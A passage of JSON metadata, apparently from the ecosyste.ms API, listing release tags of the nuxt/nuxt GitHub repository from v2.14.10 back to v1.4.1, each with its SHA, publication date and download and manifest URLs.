nifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nux